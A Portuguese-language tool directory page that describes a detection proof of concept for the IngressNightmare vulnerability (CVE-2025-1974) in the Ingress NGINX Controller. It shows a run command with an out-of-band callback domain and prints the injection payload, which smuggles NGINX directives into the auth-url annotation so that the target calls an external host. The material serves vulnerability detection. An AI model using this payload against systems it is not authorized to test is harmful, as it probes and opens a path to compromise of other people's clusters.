Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ingressnightmare-detection-poc — Ferramenta de Prova de Conceito para detetar IngressNightmare (CVE-2025-1974) por meios ativos (não intrusivos). | Kitploit
Ferramentas/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
Scanners de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoSegurança na NuvemConfiguração Incorreta
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

Ferramenta de Prova de Conceito para detetar IngressNightmare (CVE-2025-1974) por meios ativos (não intrusivos).

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Detecção IngressNightmare

Visão Geral

Esta ferramenta fornece uma capacidade de detecção não intrusiva para a cadeia de vulnerabilidades IngressNightmare (CVE-2025-1974) que afeta o Ingress NGINX Controller. Ela especificamente aproveita o vetor de injeção da anotação auth-url (CVE-2025-24514) para verificar a presença dessa vulnerabilidade crítica sem executar código arbitrário.

Contexto Técnico

A cadeia de vulnerabilidades IngressNightmare permite que invasores injetem diretivas arbitrárias de configuração do NGINX por meio de vários campos de anotação do Ingress. Quando esses recursos Ingress maliciosos são processados pelo admission controller, as diretivas injetadas são avaliadas durante a fase de validação da configuração do NGINX (nginx -t).

Este PoC explora especificamente a vulnerabilidade da anotação auth-url ao injetar a diretiva error_log com um servidor syslog apontando para um domínio controlado pelo invasor. Durante a validação da configuração, o NGINX irá:

  1. Analisar a configuração injetada
  2. Resolver o domínio especificado via DNS

Essa atividade de resolução de DNS fornece um sinal confiável de que o alvo está vulnerável, sem exigir execução de código ou interrupção do serviço.

Uso

  1. Estabeleça um listener de callback DNS usando Burp Collaborator, interactsh ou qualquer serviço de monitoramento de DNS.

  2. Execute a ferramenta de detecção:

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  3. Se vulnerável, você observará tentativas de resolução de DNS para o seu domínio de callback DNS:

poc

Metodologia de Detecção

A ferramenta cria um objeto AdmissionReview especialmente elaborado contendo um recurso Ingress com o seguinte payload de injeção:

root@kitploit:~
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"

Este payload:

  • Usa o caractere de comentário (#) para encerrar a URL
  • Injeta uma nova linha seguida de uma diretiva resolver
  • Adiciona a diretiva error_log com syslog apontando para o domínio de callback DNS
  • Comenta o restante para manter a validade sintática

Quando processado por um admission controller vulnerável, isso resulta em uma consulta DNS de saída que confirma a presença da vulnerabilidade.

Limitações

Esta ferramenta apenas detecta a presença da vulnerabilidade e não tenta explorá-la para execução de código arbitrário.

Créditos

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

Baixar ferramenta